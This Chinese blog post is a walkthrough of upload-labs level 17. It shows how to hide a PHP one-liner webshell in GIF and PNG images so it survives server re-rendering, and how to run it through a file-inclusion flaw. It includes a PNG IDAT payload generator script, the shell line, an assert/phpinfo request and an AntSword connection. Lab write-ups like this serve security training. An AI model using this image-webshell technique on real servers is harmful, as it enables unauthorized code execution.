upload-lab-17 -二次渲染绕过

最新推荐文章于 2025-03-05 21:59:08 发布
最新推荐文章于 2025-03-05 21:59:08 发布
阅读量511 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xlvbys/article/details/132722050
版权

这一关上传图片进行了判断了后缀名、content-type,以及利用imagecreatefromgif判断是否为gif图片,

最后再做了一次二次渲染,但是后端二次渲染需要找到渲染后的图片里面没有发生变化的Hex地方,

添加一句话,通过文件包含漏洞执行一句话,使用蚁剑进行连接

补充知识:

二次渲染:后端重写文件内容

basename(path[,suffix]) ,没指定suffix则返回后缀名,有则不返回指定的后缀名

strrchr(string,char)函数查找字符串在另一个字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符。

imagecreatefromgif():创建一块画布,并从 GIF 文件或 URL 地址载入一副图像

imagecreatefromjpeg():创建一块画布,并从 JPEG 文件或 URL 地址载入一副图像

imagecreatefrompng():创建一块画布,并从 PNG 文件或 URL 地址载入一副图像

这里有个小提示,对于做文件上传之二次渲染建议用GIF图片,相对于简单一点

GIF:

上传正常的GIF图片下载回显的图片,

用010Editor编辑器进行对比两个GIF图片内容,找到相同的地方(指的是上传前和上传后,两张图片的部分Hex仍然保持不变的位置)并插入PHP一句话,

上传带有PHP一句话木马的GIF图片

为了方便大家测试,这里提供一张网上某个大佬提供的GIF图片,当时我也找了很久,大家可以保存一下https://wwe.lanzoui.com/iFS

wwn53jaf

————————————————

PNG:

2.2 使用php脚本写入IDAT数据块:

1、创建一个IDAT_png.php(通过这个脚本生成一个绕过渲染的图片马):

脚本内容:

<?php$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33);$img = imagecreatetruecolor(32, 32);for ($y = 0; $y < sizeof($p); $y += 3) { $r = $p[$y]; $g = $p[$y+1]; $b = $p[$y+2]; $color = imagecolorallocate($img, $r, $g, $b); imagesetpixel($img, round($y / 3), 0, $color);}imagepng($img,'./1.png');?>

构造了一个一句话木马 长这样:

<?=$_GET[0]($_POST[1]);?>

测试探针要传递的参数:

get传参0=assert 加上 post传参1=phpinfo();

这里还利用了文件包含

最后构造的pauload:

///http://192.168.48.110/upload-labs-master/include.php

?file=upload/12648.png & 0=assert

post参数: 1=phpinfo();

连接蚁剑传递参数:

get传参0=assert 加上 密码 = 1

///http://192.168.48.110/upload-labs-master/include.php?file=upload/12648.png & 0=assert

JPEG:

成功不了 摆了摆了 看别的啦s

xlvbys
关注
upload-labs17
qq_46527080的博客
12-25 1425
第十七关(二次渲染) 源码分析 imagecreatefromjpeg — 由文件或 URL 创建一个新图象。 然后将第一个我们写入的一句话木马给转码掉了,我们找到渲染的分割线,在分割线之前来进行写入一句话木马 首先制造图片码,gif的后缀 制作完成之后在上传 上传成功之后,再下载下来查看 发现咱们的码没有了 要找渲染的分隔点 从这里可以看出,这里开始有变化,咱们看看 然后上传之后在下载 然后下载,发现一句话木马可以了 如果复制不可以的话,我们可以手敲一句话木马 然后我们再利用文件包含漏洞进行解析 http
Upload-Lab17关:二次渲染技巧轻松绕过上传限制!
didiplus
08-24 785
文件上传漏洞一直是网络安全中一个重要且复杂的领域。在Upload-Lab的第17关,我们将探讨如何利用二次渲染技术绕过文件上传验证限制。二次渲染是指服务器在文件上传后,再次处理或修改文件内容的过程。攻击者可以利用这一过程,上传一个看似安全的文件,但通过服务器的二次处理,将其转换为恶意文件。例如,上传一个合法的图片文件,但在服务器处理过程中,将其内容转变为恶意脚本。
【文件上传绕过】——二次渲染漏洞
热门推荐
weixin_45588247的博客
07-28 1万+
copy a.png /b + a.php /a 1.png: http://www.xue51.com/soft/47175.html =================================================== 1. png图片组成:   png图片由3个以上的数据块组成。   PNG定义了两种类型的数据块,一种是称为关键数据块(critical chunk),这是标准的数据块,另一种叫做辅助数据块(ancillary chunks),这是可选的数据块。   关键数据块定义
upload-labs17关详解
最新发布
2302_77037573的博客
03-05 298
此处代码先将文件移动到了上传目录然后再进行检查判断,此时我们便产生攻击思路,我们可以利用程序窗口期,程序是先上传再分析,我们可以多次重复进行上传,一边利用工具重复上传,一边再持续访问,利用程序的窗口期在未将错误文件删除之前就将其访问到,此时该文件就会生效。:这种漏洞还多发生在电商的订单系统,假如数据库使用的时MySQL,则可以使用MySQL的锁来进行防范,在提交订单后立马将该进程上锁,防止别的进程访问该进程。注意:利用MySQL的事务是无法防范该漏洞的!源码采用白名单限制后缀名只允许三种上传类型。
【文件上传绕过--二次渲染
nareku的博客
04-07 8822
二次渲染原理 在我们上传文件后,网站会对图片进行二次处理(格式、尺寸,保存,删除 要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。 绕过方法 1.配合条件竞争漏洞 ...
文件上传之路之六:绕过图片二次渲染上传
weixin_62715196的博客
08-15 1044
绕过图片二次渲染上传,文件上传的一种类型
upload-labs(Pass-17,文件上传二次渲染)
m0_64849639的博客
08-18 463
Pass-17、文件上传二次渲染
Upload-labs-master实验笔记:Pass17二次渲染
大大大蜜蜂的博客
03-28 1073
Upload-labs-master实验笔记
upload-labs-master靶场通关操作文字解说
canyiguichen的博客
09-16 467
写入到一个a.php文件中。使用点号绕过,因为你会发现,在windows中重命名文件的时候,我们在文件末尾加上点号,这个点号会被删除。上传一句话木马的时候,发现不能上传,因为他不允许上传.asp,.aspx,.php,.jsp后缀文件。这一关是提示我们类型不对,那么我们上传一句话.php的时候抓包,在那里修改我们的文件类型即可。我们上传.php7后缀的文件,发现还是能上传,这是因为他使用的黑名单还是没有过滤这个后缀名。.php2 .php3 .php4 .php5 .php6 .php7这些都能用。
upload-labs 12-17关 详解
qq_53409748的博客
03-01 715
upload-labs 12-17关 详解
UPLOAD-lab 1-19关
感恩
10-08 407
UPLOAD-LABS
upload-labs通关攻略
m0_74381003的博客
08-27 1399
upload-labs通过攻略 (1~21关详解)
制作图片马:二次渲染(upload-labs17关)
m0_72286569的博客
03-12 2961
在本关的代码中这个imagecreatefromjpeg();函数起到了将上传的图片打乱并重新组合。这就意味着在制作图片马的时候要将木马插入到图片没有被改变的部分。
upload-labs关卡记录17
m0_59527104的博客
12-28 590
看到本关卡重新渲染了图片,这时我们之前的那种图片马就没用了,我们要下载这个图片,然后和之前的图片比较,在合适的地方重新插入我们的一句话木马,这就属于是二次渲染
文件上传--Upload-labs--Pass17--条件竞争
2302_79800344的博客
02-20 1139
条件竞争原理
upload-labs靶场Pass-16二次渲染png格式上传
FRANXX_02的博客
10-10 1233
upload-labs靶场Pass-16二次渲染png格式上传colortype索引为03的索引彩色图像
upload-labs文件上传通关全套|二次渲染|条件竞争|exif_imagetype()-图片马【超详细】
qq_60115503的博客
05-05 1358
upload-labs文件上传通关全套|二次渲染|条件竞争|exif_imagetype()-图片马【超详细】 upload-labs源码地址:GitHub - c0ny1/upload-labs: 一个想帮你总结所有类型的上传漏洞的靶场 alert("请选择要上传的文件!"); ...
Upload-Labs(17-20)
Braindance
02-28 305
Pass-17 ​ (windows环境,php版本5.2.17,题号是18题) 源码: $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_name']; .
upload-labs之第十七和十八关
田田云逸的博客
10-28 2420
Pass17 打开第十七关,通过提示发现跟以前的都不一样。 看来是需要进行代码审计了,那么来看看源码吧 $is_upload = false;$msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_n.
upload-labs 二次渲染
01-05
### Upload-Labs中的二次渲染问题及其解决方案 在处理Upload-Labs项目时,遇到的二次渲染问题主要涉及文件上传后的预览功能。当用户上传图片或其他类型的文件后,在页面上显示这些文件的过程中可能会出现问题[^1]。 #### 什么是二次渲染二次渲染指的是服务器端接收到客户端提交的数据并保存到临时位置之后,再次读取该数据发送回前端浏览器的过程。在这个过程中如果处理不当,则可能导致安全漏洞或者功能性错误的发生。 #### 常见原因分析: - **MIME类型检测不严格**:某些情况下,攻击者可以绕过初步的内容验证机制,使得恶意脚本被当作正常资源加载执行。 - **缓存策略失误**:如果不恰当地设置了HTTP响应头字段(例如`Cache-Control`, `Expires`),则可能造成旧版本文件未及时更新而继续展示给访问者查看。 - **路径遍历风险**:允许任意指定存储目录结构的情况下容易引发越权操作,即未经授权便能获取敏感资料甚至控制系统行为。 针对上述提到的安全隐患以及潜在的功能缺陷,以下是几种有效的解决办法: ```php // MIME 类型白名单过滤 $allowed_mime_types = ['image/jpeg', 'image/png']; if (!in_array(mime_content_type($_FILES['file']['tmp_name']), $allowed_mime_types)) { die('Invalid file type'); } // 文件名重命名防止覆盖已有文件 $new_filename = uniqid() . '.' . pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION); move_uploaded_file($_FILES["file"]["tmp_name"], "uploads/" . $new_filename); // 设置合适的 HTTP 头来控制缓存 header("Content-Type: image/jpeg"); header("Cache-Control: no-store, no-cache, must-revalidate"); readfile("uploads/$new_filename"); ``` 通过实施严格的输入校验措施、合理规划文件系统的布局设计再加上恰当运用Web协议特性,可以在很大程度上规避由二次渲染带来的各种麻烦。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值